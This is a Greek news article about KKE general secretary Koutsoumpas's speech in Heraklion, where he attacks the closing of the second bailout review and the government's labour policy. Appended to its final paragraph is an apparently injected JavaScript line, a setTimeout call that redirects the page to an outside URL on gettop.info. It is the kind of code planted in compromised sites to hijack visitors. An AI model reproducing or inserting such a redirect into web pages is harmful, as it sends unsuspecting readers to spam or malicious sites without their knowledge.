Κουτσούμπας: Το κλείσιμο της β’ αξιολόγησης μονιμοποίηση της εργασιακής ζούγκλας

0
8

 

Στο Ηράκλειο Κρήτης βρέθηκε ο γγ της ΚΕ του ΚΚΕ όπου μίλησε σε εκδήλωση του κόμματος: «Το κλείσιμο της δεύτερης αξιολόγησης σημαίνει μονιμοποίηση της εργασιακής ζούγκλας, διατήρηση του σκληρού πυρήνα του αντεργατικού καθεστώτος που διαμορφώθηκε τα προηγούμενα χρόνια από τις κυβερνήσεις της ΝΔ και του ΠΑΣΟΚ».

Ο κ. Κουτσούμπας άσκησε κριτική στην κυβέρνηση εστιάζοντας στα εργασιακά θέματα και στην ελάφρυνση του χρέους, που εκτίμησε πως κανείς δεν πρόκειται να μειώσει χωρίς νέα μέτρα, νέες θυσίες, ενώ μίλησε και για και νέο πρόγραμμα που όπως είπε «όπως κι αν το ονομάσουν θα είναι το 4ο μνημόνιο κι ας το αρνείται η κυβέρνηση λέγοντας ούτε κουβέντα να γίνεται γι’ αυτό».

Αναφερόμενος στη δεύτερη αξιολόγηση , είπε ότι έχει ως βασικό θέμα τα εργασιακά, δηλαδή νέες ανατροπές στα εργασιακά και συνδικαλιστικά δικαιώματα και πρόσθεσε: «Το κλείσιμο της δεύτερης αξιολόγησης σημαίνει μονιμοποίηση της εργασιακής ζούγκλας, διατήρηση του σκληρού πυρήνα του αντεργατικού καθεστώτος που διαμορφώθηκε τα προηγούμενα χρόνια από τις κυβερνήσεις της ΝΔ και του ΠΑΣΟΚ που γκρέμιζαν μία – μία τις κατακτήσεις του εργατικού κινήματος, αλλά και νέα αναγκαία μέτρα στήριξης της κερδοφορίας και ανταγωνιστικότητας του κεφαλαίου».

Αναφερόμενος σ’ όσα είχε πει η νέα υπουργός εργασίας όταν ανέλαβε τα καθήκοντά της για την επιβολή της νομιμότητας στην αγορά εργασία υποστήριξε: «Τι σημαίνει νομιμότητα στην αγορά εργασίας; Η εργασιακή ζούγκλα, νόμιμη δεν είναι;» και πρόσθεσε πως «η εργασιακή ζούγκλα παραμένει και επεκτείνεται» ενώ τα περί «επιστροφής στην κανονικότητα», τα χαρακτήρισε υποσχέσεις στο κεφάλαιο πως με συνθήκες κανονικότητας θα εξασφαλίζεται η ακόμη μεγαλύτερη εκμετάλλευση των εργαζομένων από το κεφάλαιο. Με την ομιλία στο Ηράκλειο ολοκλήρωσε την τριήμερη επίσκεψή του στην Κρήτη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here